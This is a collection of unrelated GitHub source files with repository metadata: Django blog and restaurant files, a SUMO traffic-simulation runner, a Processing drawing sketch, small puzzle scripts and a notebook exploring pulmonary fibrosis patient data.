f346c7f538f075ee8c1577c89e089a80c6232447 | 571322962890d461a6b142b42f6ed66be23fb299 | /blog/admin.py | a6493140ae0a0212665647a59d6e8f86f532b104 | [] | no_license | Cyapy/my-first-blog | e94b1e012b2760506a091f9d32018d31fbd237a8 | ec94ef330634377a2f6844de5989ad0cb594c970 | refs/heads/master | 2020-07-23T10:58:54.566605 | 2019-09-10T10:59:43 | 2019-09-10T10:59:43 | 207,536,238 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 146 | py | from django.contrib import admin
#from .models import Company
from .models import Post
#admin.site.register(Company)
admin.site.register(Post)
| [
"cz.arnold1977@gmail.com"
] | cz.arnold1977@gmail.com |
fcaa9a254056832dd56dc34f39f25cba73e8989e | b04d95eb1d2769945b9d93f223d93815796206f7 | /simulation/execution/startSimulation.py | 7e9fc845db74aaca641f7c3fff0bad9605023008 | [] | no_license | DrRoad/Traffic-Simulation-in-SUMO-and-statistics-generator | 19cbca58f55b3ac64ed598641d3c69afa3edbe52 | c37627c5f32afbac904657d092d149db62cc9148 | refs/heads/master | 2022-01-09T03:06:44.135211 | 2019-07-23T19:52:43 | 2019-07-23T19:52:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,196 | py | import os
import sys
import argparse
import uuid
import datetime
import requests
from lxml import etree
import input_preprocessing as ip
if 'SUMO_HOME' in os.environ:
tools = os.path.join(os.environ['SUMO_HOME'], 'tools')
sys.path.append(tools)
else:
sys.exit("please declare environment variable 'SUMO_HOME'")
import traci
# tripInfo = "../data/input-statistics/tripinfo.xml"
# edgeLane = "../data/input-statistics/edgelane.xml"
simulation_id = ""
scenario_id = ""
scenario_description = ""
# contains TraCI control loop
def run():
    """Step the SUMO simulation via TraCI until no vehicles remain, then close."""
    # step = 0
    while traci.simulation.getMinExpectedNumber() > 0:
        # Advance one simulation step while vehicles are still expected.
        traci.simulationStep()
        # print(step)
        # step += 1
    traci.close()
    sys.stdout.flush()
def create_simulation_id():
    """Set the module-global `simulation_id` to a fresh timestamp and return it.

    Returning the id is new but backward-compatible (callers that ignore the
    return value are unaffected). Removed a leftover hard-coded debug id
    ("2054-07-19-19-35-29") that used to overwrite the generated timestamp
    and defeated the purpose of this function.
    """
    global simulation_id
    # Timestamp-based id; re-enable the uuid4 suffix if collisions within
    # the same second ever become a concern:
    # simulation_id = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S-") + str(uuid.uuid4())
    simulation_id = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S")
    return simulation_id
def get_scenario_id(filepath):
    """Read the <scenario id="..."> attribute from a sumocfg XML file and set
    the module globals `scenario_id` and `scenario_description`.

    If several <scenario> elements exist, the last one wins. Any id other
    than '1' or '2' maps to "afternoon rush hour".
    """
    tree = etree.parse(filepath)
    root = tree.getroot()
    global scenario_id
    global scenario_description
    for elem in root.iter('scenario'):
        scenario_id = elem.attrib['id']
    if scenario_id == '1':
        scenario_description = "morning rush hour"
    elif scenario_id == '2':
        scenario_description = "noon"
    else:
        scenario_description = "afternoon rush hour"
def add_id_to_tripinfo(filepath):
    """Stamp the simulation/scenario ids onto <tripinfos> in tripinfo.xml.

    Reads `filepath`/tripinfo.xml, sets id/scenario_id/scenario_description
    attributes from the module globals, and rewrites the file in place.
    """
    path = filepath + "tripinfo.xml"
    tree = etree.parse(path)
    root = tree.getroot()
    for elem in root.iter('tripinfos'):
        elem.set('id', simulation_id)
        elem.set('scenario_id', scenario_id)
        elem.set('scenario_description', scenario_description)
    tree.write(path)
    print('The statistics id was added', simulation_id)
def add_scenario_to_edge_file(filepath, type_of_file='edgelane'):
    """Stamp the scenario id/description onto <meandata> in an edge output file.

    `type_of_file` selects edge.xml ('edge') or edgelane.xml (anything else,
    default 'edgelane') under `filepath`; the file is rewritten in place.
    """
    if type_of_file == 'edge':
        path = filepath + "edge.xml"
    else:
        path = filepath + "edgelane.xml"
    tree = etree.parse(path)
    root = tree.getroot()
    for elem in root.iter('meandata'):
        elem.set('scenario_id', scenario_id)
        elem.set('scenario_description', scenario_description)
    tree.write(path)
    print('The scenario id and description are added' + " to " + type_of_file, scenario_id + ' and' + scenario_description)
def create_xml_file(filepath, freq, sim_id):
    """Write the SUMO 'additional' file declaring laneData/edgeData outputs.

    The file is written to `filepath` + "additional.xml" and its path is
    returned. laneData gets the aggregation frequency `freq`; both elements
    carry `sim_id` and point SUMO at edgelane.xml / edge.xml respectively.
    """
    path = filepath + "additional.xml"
    lane_element = '<laneData id="{0}" file="edgelane.xml" freq="{1}"/>'.format(sim_id, freq)
    edge_element = '<edgeData id="{0}" file="edge.xml" />'.format(sim_id)
    with open(path, 'w') as fb:
        fb.write('<additional>')
        fb.write(lane_element + edge_element)
        fb.write('</additional>')
    return path
def Main():
create_simulation_id()
parser = argparse.ArgumentParser()
parser.add_argument('--config', default="../data/input-simulation/scenario2.sumocfg", type=str, help='Give the path to the sumocfg file')
# parser.add_argument('--additional', default="../data/input-statistics/additional.xml", type=str, help = 'Give the path to the additional file for tripinfo output')
parser.add_argument('--lanepath', default="../data/output-simulation/", type=str,
help='Give the filepath where you want the lanepath to be saved..')
parser.add_argument('--edgepath', default="../data/output-simulation/", type=str,
help='Give the filepath where you want the lanepath to be saved..')
parser.add_argument('--trippath', default="../data/output-simulation/", type=str,
help='Give the filepath where you want the tripinfo to be saved.')
parser.add_argument('--color', default="origin", type=str,
help='Type whether you want cars to be colored based on origin (default) or destination.')
parser.add_argument('--freq', default=600, type=int)
args = parser.parse_args()
success = ip.set_origin_dest_veh_color(args.color)
sumoBinary = "sumo-gui"
get_scenario_id(args.config)
print(scenario_id, scenario_description)
# # traci starts sumo as a subprocess and then this script connects and runs
sumoCMD = [sumoBinary, "-c", args.config,
"--additional-files", create_xml_file(args.lanepath, args.freq, simulation_id), "--tripinfo-output",
args.trippath + 'tripinfo.xml']
print(sumoCMD)
traci.start(sumoCMD)
run()
add_id_to_tripinfo(args.trippath)
add_scenario_to_edge_file(args.edgepath, 'edge')
add_scenario_to_edge_file(args.edgepath)
# # make post request
# # Set the name of the XML file.
#
# trips_xml = "../data/output-simulation/" + "tripinfo.xml"
# url_trips = "http://ios19kirch.ase.in.tum.de/api/simulation/input/trip"
#
# edge_lane_xml = "../data/output-simulation/" + "edgelane.xml"
# url_edge_lane = "http://ios19kirch.ase.in.tum.de/api/simulation/input/flow"
#
# edges_xml = "../data/output-simulation/" + "edge.xml"
# url_edges = "http://ios19kirch.ase.in.tum.de/api/simulation/input/mainroads"
#
# headers = {
# 'Content-Type': 'text/xml'
# }
#
# with open(trips_xml, 'r') as xml:
# # Give the object representing the XML file to requests.post.
# the_data = xml.read()
# r = requests.post(url_trips, data=the_data)
# print(r.content)
#
# with open(edge_lane_xml, 'r') as xml:
# # Give the object representing the XML file to requests.post.
# the_data = xml.read()
# r = requests.post(url_edge_lane, data=the_data)
# print(r.content)
#
# with open(edges_xml, 'r') as xml:
# # Give the object representing the XML file to requests.post.
# the_data = xml.read()
# r = requests.post(url_edges, data=the_data)
# print(r.content)
if __name__ == "__main__":
Main() | [
"ge36voj@mytum.de"
] | ge36voj@mytum.de |
955a3394f44e953f1a4c30c5c454af78e16f84da | a2477654a0fb85f9507389ff7a4b4a8bcc1641fa | /trydjango1-11/src/restaurants/migrations/0003_auto_20170926_1624.py | 5708b2f804f86a92b2d7213e1dbc4f79de3a24b5 | [] | no_license | ervinpepic/Django-11-Restaurant-app | 6ae1e2dec7571b0180ea991ca80b9b83d00cdb1b | a6bd976130c70621e6149ee64c61e1cdcec2acba | refs/heads/master | 2022-10-18T08:34:11.496044 | 2017-11-25T19:57:36 | 2017-11-25T19:57:36 | 111,400,182 | 0 | 1 | null | 2022-10-10T08:12:45 | 2017-11-20T11:13:00 | Python | UTF-8 | Python | false | false | 416 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-09-26 16:24
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('restaurants', '0002_restaurant_location'),
]
operations = [
migrations.RenameModel(
old_name='Restaurant',
new_name='RestaurantLocation',
),
]
| [
"ervin.hack@gmail.com"
] | ervin.hack@gmail.com |
c36efc1843c3021c334a94bbf23e9898a24991eb | d0235e8259db910f577f418c644f2861b10df3ab | /rectangle_teddybear.pyde | 4c1bd4dd6e664665136a64109ccded12a53fd6b7 | [] | no_license | Ganesh2608/CG | 6b865f35da6f11066defb0bc9cbcef067098ca16 | aa926e54d0089cf22c110f13a01d7313129fc705 | refs/heads/master | 2020-03-27T13:19:45.141485 | 2018-11-12T06:33:12 | 2018-11-12T06:33:12 | 146,603,090 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 664 | pyde | def setup():
#global viewport;
size(700,800);
#viewport = createGraphics();
def draw():
fill(255);
rect(200,120,95,70); #head
rect(225,190,45,160); #body line
rect(270,215,80,27); #hands
rect(145,215,80,27); #hands
rect(270,323,80,27); #legs
rect(145,323,80,27); #legs
rect(230,144,8,8); #eyes left
rect(259,144,8,8); #eyes right
rect(245,155,8,13); #nose
rect(235,173,28,7); #mouth
fill(200,0,0);
rect(239,175,20,5); #tongue
fill(0);
rect(232,146,4,4); #eyes left ball
rect(261,146,4,4); #eyes right ball
| [
"noreply@github.com"
] | noreply@github.com |
c1cc453fc746b6bc98f3d3c7890760918bc8317e | 5080f19c30738bff67e49eff7b91d3ba4315cd21 | /practice_pizza2020/test.py | ceb9be11a12ed3a579279bbd924093222874d8ef | [] | no_license | VincentZ-42/HashCode2020 | ad1edb71c20500f7ed0ab9b600e1fef926a839be | d30b3ae2549549dd133e134e3c3c77ecea0a5fb8 | refs/heads/master | 2021-01-07T12:59:54.862461 | 2020-02-20T22:57:09 | 2020-02-20T22:57:09 | 241,702,219 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,443 | py | # **************************************************************************** #
# #
# ::: :::::::: #
# test.py :+: :+: :+: #
# +:+ +:+ +:+ #
# By: vzhao <vzhao@student.42.fr> +#+ +:+ +#+ #
# +#+#+#+#+#+ +#+ #
# Created: 2020/02/19 11:56:47 by vzhao #+# #+# #
# Updated: 2020/02/19 20:59:48 by vzhao ### ########.fr #
# #
# **************************************************************************** #
import os
def subset_sum(file_path, file, OG, numbers, target, partial =[]):
"""
Function traverses through list of numbers to find the combination
that matches the target value (Function runs recursively)
Args:
(str) file_path = path to out the file
(file) file = the file id that we will write into
(list) OG = original set of numbers
(list) numbers = list of pizza types that is changed throughout recursion
(int) target = the total number of pizzas we want
(list) partial = list placeholder we use to hold the different types of pizzas
Returns:
Nothing...recursion stops once all combinations are found
"""
s = sum(partial)
if s == target:
file.write(str(len(partial)))
file.write("\n")
for j in range(len(partial)):
file.write(str(OG.index(partial[j])))
if j < len(partial) - 1:
file.write(" ")
file.write("\n")
if s >= target:
return
for i in range(len(numbers)):
file.close()
if os.path.getsize(file_path) != 0:
return
file = open(file_path, "w")
n = numbers[i]
remaining = numbers[i+1:]
subset_sum(file_path, file, OG, remaining, target, partial + [n])
a_in = open("a_example.in", "r") # This opens the text file and saves it into a variable
b_in = open("b_small.in", "r")
c_in = open("c_medium.in", "r")
d_in = open("d_quite_big.in", "r")
e_in = open("e_also_big.in", "r")
# -----------------------------Change this to get different outputs--------------------
# Reads the entire file and saves it into list
# Replace......
# a_in --> b_in (input from example b)
# a_out --> b_out (output of example b)
# "a_out" --> b_out (path name of newly created output file)
lines = c_in.readlines() # Change a_in to b_in
a_out = open("c_out", "w") # Change "a_out" to b_out
file_path = "c_out" # Change "a_out" to b_out
#---------------------------------------------------------------------------------------
slices, types = map(int, lines[0].split()) # Splits the first line into int variales
pizzas = map(int, lines[1].split()) # Splits the 2nd line into list of integers
# This checks if the file is empty or not
# Can also use os.stat(file_path).st_size == 0 as condition
if os.path.getsize(file_path) == 0:
print "File is empty"
else:
print "File is not empty"
while os.path.getsize(file_path) == 0:
a_out = open(file_path, "w")
subset_sum(file_path, a_out, pizzas, pizzas, slices)
slices -= 1
# a_out.close()
if os.path.getsize(file_path) == 0:
print "File is empty"
else:
print "File is not empty"
a_in.close()
b_in.close()
c_in.close()
d_in.close()
e_in.close()
| [
"vzhao@e1z1r4p3.42.us.org"
] | vzhao@e1z1r4p3.42.us.org |
7948a9e20dfc18adb728f35ea7d8d4a1387faf1a | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2408/60670/279400.py | 462432fde739ac9f0e437d3408deb95a44e663a4 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 360 | py | def isPrime(x):
for i in range(2,int(x**0.5)+1):
if x%i!=0:
return False
return True
def factorial(n):
t=1
for i in range(1,n):
t*=i
return t%1000000007
n=int(input())
numOfPrime=0
for i in range(1,n+1):
if isPrime(i):
numOfPrime+=1
print((factorial(numOfPrime)*factorial(n-numOfPrime))%1000000007) | [
"1069583789@qq.com"
] | 1069583789@qq.com |
509e9d56682a9e7858514eff9ca4d13b748a8656 | 4ad9ae34e6d015ef865e93db71ac909531561ebe | /main.py | c65492feaa5b6e0797b04be2a760656191b624be | [] | no_license | chetanpujari5105/100DaysOfCodeInPython2021-Day-7 | 951e51cc420d5ea5dc2a6ee32e979e12ba466348 | 25055f6aa2030d27df0e721ced0a716404ccffa5 | refs/heads/main | 2023-02-13T21:45:10.933264 | 2021-01-10T18:18:43 | 2021-01-10T18:18:43 | 328,449,335 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 901 | py | states_of_america = ["Delaware", "Pennsylvania", "New Jersey", "Georgia", "Connecticut", "Massachusetts", "Maryland", "South Carolina", "New Hampshire", "Virginia", "New York", "North Carolina", "Rhode Island", "Vermont", "Kentucky", "Tennessee", "Ohio", "Louisiana", "Indiana", "Mississippi", "Illinois", "Alabama", "Maine", "Missouri", "Arkansas", "Michigan", "Florida", "Texas", "Iowa", "Wisconsin", "California", "Minnesota", "Oregon", "Kansas", "West Virginia", "Nevada", "Nebraska", "Colorado", "North Dakota", "South Dakota", "Montana", "Washington", "Idaho", "Wyoming", "Utah", "Oklahoma", "New Mexico", "Arizona", "Alaska", "Hawaii"]
print(states_of_america)
print(states_of_america[1])
dirty_dozen = ["Strawberries", "Spinach", "Kale", "Nectarines", "Apples", "Grapes", "Peaches", "Cherries", "Pears", "Tomatoes", "Celery", "Potatoes"]
dirty_dozen.append("Banana")
print(dirty_dozen[-1])
| [
"noreply@github.com"
] | noreply@github.com |
d482fc54652390d38a71486ad7896776534966ae | 64ad122b299e457e2b37fddf9b059bdbf5858ca8 | /src/pose_estimation/scripts/image_processor.py | b2db59ae85d4feec36eb2651722ef72e9337183a | [] | no_license | faheinrich/pose_project | 8218d140f6020bc56bad1ef7ac3a40e53a6a3053 | 23e4283358940f662e7b12d1ad98d7ebc3c2efe6 | refs/heads/main | 2023-05-12T21:06:14.628014 | 2021-06-01T20:27:19 | 2021-06-01T20:27:19 | 365,174,377 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,045 | py | #!/usr/bin/env python3
# Description:
# - Subscribes to real-time streaming video from your built-in webcam.
#
# Author:
# - Addison Sears-Collins
# - https://automaticaddison.com
# Import the necessary libraries
import rospy # Python library for ROS
from sensor_msgs.msg import Image # Image is the message type
from cv_bridge import CvBridge # Package to convert between ROS and OpenCV Images
import cv2 # OpenCV library
# import sys
# import time
# import logging
# import numpy as np
# import matplotlib.pyplot as plt
# import cv2
# from tf_pose import common
# from tf_pose.estimator import TfPoseEstimator
# from tf_pose.networks import get_graph_path, model_wh
pub = rospy.Publisher('view_this', Image, queue_size=1)
# """
# https://learnopencv.com/deep-learning-based-human-pose-estimation-using-opencv-cpp-python/
# """
# # Specify the paths for the 2 files
# protoFile = "/home/fabian/ros/catkin_ws/resources/cv2_net/pose/mpi/pose_deploy_linevec.prototxt"
# weightsFile = "/home/fabian/ros/catkin_ws/resources/cv2_net/pose/mpi/pose_iter_160000.caffemodel"
# # Read the network into Memory
# net = cv2.dnn.readNetFromCaffe(protoFile, weightsFile)
# inWidth = 368
# inHeight = 368
# threshold = 0.6
def process_frame(frame):
# frame = cv2.resize(frame, (inHeight, inWidth))
# # frame = cv2.resize(frame, (inHeight, inWidth))
# # Prepare the frame to be fed to the network
# inpBlob = cv2.dnn.blobFromImage(frame, 1.0 / 255, (inWidth, inHeight), (0, 0, 0), swapRB=False, crop=False)
# # Set the prepared object as the input blob of the network
# net.setInput(inpBlob)
# output = net.forward()
# rospy.loginfo(output.shape)
# H = output.shape[2]
# W = output.shape[3]
# # Empty list to store the detected keypoints
# points = []
# # 44 for mpi
# for i in range(44):
# # confidence map of corresponding body's part.
# probMap = output[0, i, :, :]
# # Find global maxima of the probMap.
# minVal, prob, minLoc, point = cv2.minMaxLoc(probMap)
# # Scale the point to fit on the original image
# x = (inWidth * point[0]) / W
# y = (inHeight * point[1]) / H
# if prob > threshold :
# cv2.circle(frame, (int(x), int(y)), 5, (0, 255, 255), thickness=-1, lineType=cv2.FILLED)
# # cv2.putText(frame, "{}".format(i), (int(x), int(y)), cv2.FONT_HERSHEY_SIMPLEX, 1.4, (0, 0, 255), 3, lineType=cv2.LINE_AA)
# # Add the point to the list if the probability is greater than the threshold
# points.append((int(x), int(y)))
# else :
# points.append(None)
# cv2.imshow("Output-Keypoints",frame)
# cv2.waitKey()
# for pair in POSE_PAIRS:
# partA = pair[0]
# partB = pair[1]
# if points[partA] and points[partB]:
# cv2.line(frameCopy, points[partA], points[partB], (0, 255, 0), 3)
# from rgb to bgr to show change
return frame[:,:,::-1]
def callback(data):
# Used to convert between ROS and OpenCV images
br = CvBridge()
# Output debugging information to the terminal
rospy.loginfo("receiving video frame")
# Convert ROS Image message to OpenCV image
received_frame = br.imgmsg_to_cv2(data)
rospy.loginfo('processing received image')
processed_frame = process_frame(received_frame)
pub.publish(br.cv2_to_imgmsg(processed_frame))
def receive_message():
# Tells rospy the name of the node.
# Anonymous = True makes sure the node has a unique name. Random
# numbers are added to the end of the name.
rospy.init_node('image_processor', anonymous=True)
# Node is subscribing to the video_frames topic
rospy.Subscriber('webcam_frames', Image, callback)
# spin() simply keeps python from exiting until this node is stopped
rospy.spin()
# Close down the video stream when done
cv2.destroyAllWindows()
if __name__ == '__main__':
receive_message()
| [
"faheinrich98@gmail.com"
] | faheinrich98@gmail.com |
48489ccc71bb088f7c28deb51e9c47dcd3617c1c | 43226c0909e4164c4f69f1e462e6d089100131ee | /leap year yes or no.py | d610078f8b940c1822590c71a8c7421509a33a61 | [] | no_license | subashbabu97/leapyear | 8bf9e0449b65305c423350c5117d744304bee68b | 5cf9440abd8468f469dcf6fe30b43f54df84f92c | refs/heads/master | 2020-05-31T22:55:34.982996 | 2019-06-06T06:51:11 | 2019-06-06T06:51:11 | 190,529,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 95 | py | a=int(input("Input:"))
b=a%4
if b==0:
print("Output:yes")
else:
print("Output:no")
| [
"noreply@github.com"
] | noreply@github.com |
8c49afcd2557458371bc37031be00356b871799d | 092e00ae8389811929a381637b73dcb2303fefeb | /blog/domain/user.py | 338592ec2da4b0e0020f532f84602d13ba2ace07 | [] | no_license | uiandwe/rest_framework_ex | 33cfb73e386785009b1d012a3dfa6909bdc74ab3 | 8130bcf9a6ffd67b91906c85d66ed9d8d453bab8 | refs/heads/master | 2022-11-27T20:56:26.911462 | 2021-10-12T07:46:17 | 2021-10-12T07:46:17 | 234,095,110 | 0 | 0 | null | 2022-11-22T05:17:55 | 2020-01-15T14:12:34 | Python | UTF-8 | Python | false | false | 220 | py | # -*- coding: utf-8 -*-
class User:
def __init__(self, email, username):
self.email = email
self.username = username
def __repr__(self):
return "{}, {}".format(self.email, self.username)
| [
"uiandwe@gmail.com"
] | uiandwe@gmail.com |
36815ed5dbc21619f0e347fd9614d4889ea71b0d | bfb882c400956861fccd40bf1fb53cd6ddcba41e | /hagelslag/processing/__init__.py | 947f56449e95c6deffd11da0f81a50f94c71a716 | [
"MIT"
] | permissive | stsaten6/hagelslag | 3b1b07cf424997686b3320c538a188c790232bd7 | 6b7d0779a0b0ac4bd26fbe4931b406fad1ef9f9e | refs/heads/master | 2020-03-10T17:38:44.528943 | 2018-04-12T20:50:38 | 2018-04-12T20:50:38 | 129,504,847 | 2 | 0 | MIT | 2018-04-14T09:58:37 | 2018-04-14T09:58:37 | null | UTF-8 | Python | false | false | 524 | py | from .EnhancedWatershedSegmenter import EnhancedWatershed
from .EnsembleProducts import MachineLearningEnsembleProducts, EnsembleProducts, EnsembleConsensus
from .Hysteresis import Hysteresis
from .ObjectMatcher import ObjectMatcher, TrackMatcher
from .ObjectMatcher import mean_minimum_centroid_distance, centroid_distance, shifted_centroid_distance, nonoverlap, \
mean_min_time_distance, start_centroid_distance, start_time_distance, closest_distance
from .STObject import STObject, read_geojson
from .tracker import * | [
"djgagne@ou.edu"
] | djgagne@ou.edu |
fad84be7b3588e086eaa4f7158e430de704c6e85 | e35d35b22f11be27f439900e97248b7cab7aa85e | /client.py | beb1d0771d531e912584b4e968bc4f762d483a90 | [] | no_license | jkaria/chat-server | e1903912e047180077eb4b2bf9b7d2db1637fe33 | b92e0af97a1d4105d070b15951c91d7e406c39ab | refs/heads/master | 2020-03-20T23:08:22.980615 | 2018-06-22T04:14:42 | 2018-06-22T04:14:42 | 137,831,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,458 | py | import websocket
import _thread as thread
import sys
import re
import json
def on_message(ws, message):
print(f"received > {message}")
def on_error(ws, error):
print(f"error > {error}")
def on_close(ws):
print("Server connection closed")
def on_open(ws):
def run(*args):
msg_format = re.compile("(.+):\s(.+)")
while True:
msg = input("<Enter message in format 'to_user_id: msg' (enter 'quit' to exit)>:\n")
if msg == 'quit':
break
m = msg_format.match(msg)
if not m:
print("invalid message format")
continue
ws.send(json.dumps({'to_user_id': m[1], 'message': m[2]}))
print(f"< sending: {m[2]}...")
ws.close()
print("Closed connection. Thread terminating...")
#TODO: look into async input to get read of this thread
thread.start_new_thread(run, ())
def connect_to_server(srv_port, username):
websocket.enableTrace(True)
ws = websocket.WebSocketApp(f"ws://localhost:{srv_port}/client/{username}",
on_message = on_message,
on_error = on_error,
on_close = on_close)
ws.on_open = on_open
ws.run_forever()
if len(sys.argv) != 3:
print("Correct usage: server.py <server_port_number> <username>")
exit(1)
connect_to_server(int(sys.argv[1]), str(sys.argv[2]))
| [
""
] | |
a47a860993c205588ad7942665c79c7af1f7846f | ee5f91fdc5d63cb1668185de611e5d0e363a006f | /Untitled1.py | ada39f951b0541519b131fe64018622e6177ad55 | [] | no_license | vikram-sreedhar/Pulmonary-Fibrosis | 38b9f020049e3fab197556a2f6b4fa71e9b6fe9b | 267f1d041f61cf86892c94aa946b89eac2b9f60b | refs/heads/master | 2022-12-17T06:21:44.062236 | 2020-09-27T20:01:13 | 2020-09-27T20:01:13 | 299,106,153 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,383 | py | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import os
# In[2]:
# Visualisation libraries
import matplotlib.pyplot as plt
# In[3]:
import seaborn as sns
sns.set()
from plotly.offline import init_notebook_mode, iplot
import plotly.graph_objs as go
import plotly.offline as py
import pycountry
py.init_notebook_mode(connected=True)
import folium
from folium import plugins
# Graphics in retina format
get_ipython().run_line_magic('config', "InlineBackend.figure_format = 'retina'")
# Increase the default plot size and set the color scheme
plt.rcParams['figure.figsize'] = 8, 5
#plt.rcParams['image.cmap'] = 'viridis'
# palette colors to be used for plots
colors = ["steelblue","dodgerblue","lightskyblue","powderblue","cyan","deepskyblue","cyan","darkturquoise","paleturquoise","turquoise"]
# Disable warnings in Anaconda
import warnings
warnings.filterwarnings('ignore')
# In[4]:
from pathlib import Path
# In[5]:
from IPython.display import YouTubeVideo
YouTubeVideo('1Kyo9Hcyiq0', width=800, height=300)
# In[6]:
get_ipython().run_line_magic('pwd', '')
# In[7]:
os.chdir('D:\Kaggle\Pulmonary Fibrosis')
# In[8]:
get_ipython().run_line_magic('pwd', '')
# In[9]:
## Reading input and directory path
train = pd.read_csv('train.csv')
dataset_dir = 'D:\\Kaggle\\Pulmonary Fibrosis\\train'
# In[10]:
train
# In[95]:
test = pd.read_csv('test.csv')
# In[96]:
test
# In[13]:
## Reading test and train data
print('Train:\n',train.head(5),'\n')
print(train.isna().sum())
print('\n---------------------------------------------------------------------------\n')
print('Test:\n',test.head(5),'\n')
print(test.isna().sum())
# In[14]:
train.info()
# In[15]:
train.describe()
# In[16]:
dataset_dir
# In[17]:
train.shape[0]
# In[18]:
test.shape[0]
# In[19]:
INPUT = Path("D:/Kaggle/Pulmonary Fibrosis/train")
# In[20]:
INPUT
# In[21]:
train.Patient.agg(['nunique','count'])
# In[22]:
test.Patient.agg(['nunique','count'])
# In[23]:
fig, ax = plt.subplots(1,2,figsize=(20,5))
sns.countplot(train.Sex, palette="Reds_r", ax=ax[0]);
ax[0].set_xlabel("")
ax[0].set_title("Gender counts");
sns.countplot(test.Sex, palette="Blues_r", ax=ax[1]);
ax[1].set_xlabel("")
ax[1].set_title("Gender counts");
# In[24]:
get_ipython().run_line_magic('matplotlib', 'inline')
# In[25]:
fig, axs = plt.subplots(ncols=3)
fig.set_size_inches(19,6)
sns.countplot(train['SmokingStatus'],ax=axs[0])
sns.countplot(train['SmokingStatus'][train['Sex']=="Male"],ax=axs[1])
sns.countplot(train['SmokingStatus'][train['Sex']=="Female"],ax=axs[2])
fig.savefig("output2.jpeg")
# In[26]:
# Select unique bio info for the patients
agg_train = train.groupby(by="Patient")[["Patient", "Age", "Sex", "SmokingStatus"]].first().reset_index(drop=True)
# Figure
f, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize = (16, 6))
a = sns.distplot(agg_train["Age"], ax=ax1, hist=False, kde_kws=dict(lw=6, ls="--"))
b = sns.countplot(agg_train["Sex"], ax=ax2)
c = sns.countplot(agg_train["SmokingStatus"], ax=ax3)
a.set_title("Patient Age Distribution", fontsize=16)
b.set_title("Sex Frequency", fontsize=16)
c.set_title("Smoking Status", fontsize=16);
# In[27]:
fig, axs = plt.subplots(ncols=3)
fig.set_size_inches(19,6)
sns.countplot(test['SmokingStatus'],ax=axs[0])
fig.savefig("output3.jpeg")
# In[28]:
fig, ax = plt.subplots()
fig.set_size_inches(11.7, 8.27)
sns.distplot(train.Age,kde=False,bins=80,color="k")
fig.savefig("output4.jpeg")
# In[29]:
fig, ax = plt.subplots()
fig.set_size_inches(11.7, 8.27)
sns.distplot(test.Age,kde=False,bins=80,color="k")
fig.savefig("output5.jpeg")
# In[30]:
print("Min FVC value: {:,}".format(train["FVC"].min()), "\n" +
"Max FVC value: {:,}".format(train["FVC"].max()), "\n" +
"\n" +
"Min Percent value: {:.4}%".format(train["Percent"].min()), "\n" +
"Max Percent value: {:.4}%".format(train["Percent"].max()))
# Figure
f, (ax1, ax2) = plt.subplots(1, 2, figsize = (16, 6))
a = sns.distplot(train["FVC"], ax=ax1, hist=False, kde_kws=dict(lw=6, ls="--"))
b = sns.distplot(train["Percent"], ax=ax2, hist=False, kde_kws=dict(lw=6, ls="-."))
a.set_title("FVC Distribution", fontsize=16)
b.set_title("Percent Distribution", fontsize=16);
# In[31]:
print("Minimum no. weeks before CT: {}".format(train['Weeks'].min()), "\n" +
"Maximum no. weeks after CT: {}".format(train['Weeks'].max()))
plt.figure(figsize = (16, 6))
a = sns.distplot(train['Weeks'], hist=False, kde_kws=dict(lw=8, ls="--"))
plt.title("Number of weeks before/after the CT scan", fontsize = 16)
plt.xlabel("Weeks", fontsize=14);
# In[32]:
def create_baseline():
first_scan=pd.DataFrame()
for i in train.Patient.unique():
first_scan=first_scan.append((train[train['Patient']=="{}".format(i)][:1]))
first_scan=first_scan.drop("Patient",axis=1)
first_scan=first_scan.drop("Weeks",axis=1)
return first_scan
fc=create_baseline()
fc=fc.reset_index(drop=True)
fc.head()
# In[33]:
fc
# In[34]:
(sns.pairplot(train,hue="SmokingStatus",height=4)).savefig("output5.jpeg")
# In[35]:
sns.pairplot(fc,hue="SmokingStatus",height=4).savefig("output6.jpeg")
# In[36]:
fig, ax = plt.subplots(nrows=2)
fig.set_size_inches(22, 8.27)
sns.lineplot(x='Weeks',y='Percent',data=train,ax=ax[0]).set_title("All Patients Percent trend",fontsize=15,y=0.85)
sns.lineplot(x='Weeks',y='FVC',data=train,ax=ax[1]).set_title("All Patients FVC trend",fontsize=15,y=0.85)
fig.savefig("weeksfvccomp.jpeg")
# In[37]:
# FVC and Percent trend Males vs Females
males=train[train["Sex"]=="Male"]
females=train[train["Sex"]=="Female"]
# In[38]:
fig, ax = plt.subplots(nrows=4)
fig.set_size_inches(22, 22)
sns.lineplot(x='Weeks',y='FVC',data=males,ax=ax[0]).set_title("MALES FVC TREND", fontsize=15,y=0.85)
sns.lineplot(x='Weeks',y='FVC',data=females,ax=ax[1]).set_title("FEMALES FVC TREND", fontsize=15,y=0.85)
sns.lineplot(x='Weeks',y='Percent',data=males,ax=ax[2]).set_title("MALES PERCENT TREND", fontsize=15,y=0.85)
sns.lineplot(x='Weeks',y='Percent',data=females,ax=ax[3]).set_title("FEMALES PERCENT TREND", fontsize=15,y=0.85)
fig.savefig("malevsfemalesfvc_percenttrend.jpeg")
# In[39]:
# FVC and Percent trend Smokers vs nonsmokers for all patients
smoker=train[train["SmokingStatus"]=="Ex-smoker"]
